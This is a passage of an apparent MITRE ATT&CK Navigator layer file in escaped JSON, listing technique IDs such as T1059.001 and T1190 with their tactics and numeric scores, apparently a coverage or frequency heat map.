true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1606\",\n      \"tactic\": \"credential-access\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1528\",\n      \"tactic\": \"credential-access\",\n      \"score\": 14,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1140\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 18,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1098\",\n      \"tactic\": \"persistence\",\n      \"score\": 29,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1098\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 29,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1589\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1110\",\n      \"tactic\": \"credential-access\",\n      \"score\": 25,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n 
   {\n      \"techniqueID\": \"T1078.004\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 40,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.004\",\n      \"tactic\": \"persistence\",\n      \"score\": 40,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.004\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 40,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.004\",\n      \"tactic\": \"initial-access\",\n      \"score\": 40,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1552\",\n      \"tactic\": \"credential-access\",\n      \"score\": 11,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1548\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 22,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1548\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 22,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1556\",\n      \"tactic\": 
\"credential-access\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1556\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1556\",\n      \"tactic\": \"persistence\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1098.003\",\n      \"tactic\": \"persistence\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1098.003\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1484\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1484\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1098.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n  
    \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1098.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1098.005\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1098.005\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1485\",\n      \"tactic\": \"impact\",\n      \"score\": 20,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1496\",\n      \"tactic\": \"impact\",\n      \"score\": 13,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1489\",\n      \"tactic\": \"impact\",\n      \"score\": 19,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053.003\",\n      \"tactic\": \"execution\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n   
 {\n      \"techniqueID\": \"T1053.003\",\n      \"tactic\": \"persistence\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053.003\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1552.007\",\n      \"tactic\": \"credential-access\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1562.004\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 29,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1552.001\",\n      \"tactic\": \"credential-access\",\n      \"score\": 24,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1562.007\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1565.001\",\n      \"tactic\": \"impact\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1003\",\n      \"tactic\": \"credential-access\",\n   
   \"score\": 34,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1059\",\n      \"tactic\": \"execution\",\n      \"score\": 94,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1562\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 27,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1562.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 127,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1578\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1578.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1531\",\n      \"tactic\": \"impact\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1621\",\n      \"tactic\": \"credential-access\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      
\"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1556.006\",\n      \"tactic\": \"credential-access\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1556.006\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1556.006\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1087.004\",\n      \"tactic\": \"discovery\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1526\",\n      \"tactic\": \"discovery\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1565\",\n      \"tactic\": \"impact\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1074\",\n      \"tactic\": \"collection\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": 
\"T1484.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1484.002\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1114\",\n      \"tactic\": \"collection\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1573\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1199\",\n      \"tactic\": \"initial-access\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1537\",\n      \"tactic\": \"exfiltration\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1486\",\n      \"tactic\": \"impact\",\n      \"score\": 16,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1020\",\n      \"tactic\": \"exfiltration\",\n      \"score\": 9,\n      \"color\": \"\",\n      
\"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1136.003\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1070\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 20,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1550\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1550\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1550.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1550.001\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1190\",\n      \"tactic\": \"initial-access\",\n      \"score\": 146,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n     
 \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1059.001\",\n      \"tactic\": \"execution\",\n      \"score\": 217,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1059.003\",\n      \"tactic\": \"execution\",\n      \"score\": 44,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1059.004\",\n      \"tactic\": \"execution\",\n      \"score\": 14,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1059.009\",\n      \"tactic\": \"execution\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1021.007\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1562.008\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1608.003\",\n      \"tactic\": \"resource-development\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1525\",\n      
\"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1566\",\n      \"tactic\": \"initial-access\",\n      \"score\": 14,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1566.002\",\n      \"tactic\": \"initial-access\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1580\",\n      \"tactic\": \"discovery\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1619\",\n      \"tactic\": \"discovery\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1005\",\n      \"tactic\": \"collection\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1490\",\n      \"tactic\": \"impact\",\n      \"score\": 26,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1136\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      
\"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.002\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.002\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.002\",\n      \"tactic\": \"initial-access\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1555\",\n      \"tactic\": \"credential-access\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1105\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 81,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1027\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 94,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n 
   {\n      \"techniqueID\": \"T1567\",\n      \"tactic\": \"exfiltration\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1568.002\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1572\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 24,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1102\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 13,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1571\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1082\",\n      \"tactic\": \"discovery\",\n      \"score\": 33,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1056.001\",\n      \"tactic\": \"collection\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1056.001\",\n      \"tactic\": \"credential-access\",\n      
\"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1123\",\n      \"tactic\": \"collection\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055.009\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055.009\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1201\",\n      \"tactic\": \"discovery\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1069.001\",\n      \"tactic\": \"discovery\",\n      \"score\": 16,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1007\",\n      \"tactic\": \"discovery\",\n      \"score\": 11,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1222.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      
\"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1059.012\",\n      \"tactic\": \"execution\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1529\",\n      \"tactic\": \"impact\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1083\",\n      \"tactic\": \"discovery\",\n      \"score\": 24,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1048.003\",\n      \"tactic\": \"exfiltration\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1133\",\n      \"tactic\": \"persistence\",\n      \"score\": 19,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1133\",\n      \"tactic\": \"initial-access\",\n      \"score\": 19,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1553.004\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 10,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": 
\"T1033\",\n      \"tactic\": \"discovery\",\n      \"score\": 30,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1593.003\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1115\",\n      \"tactic\": \"collection\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1564\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 10,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      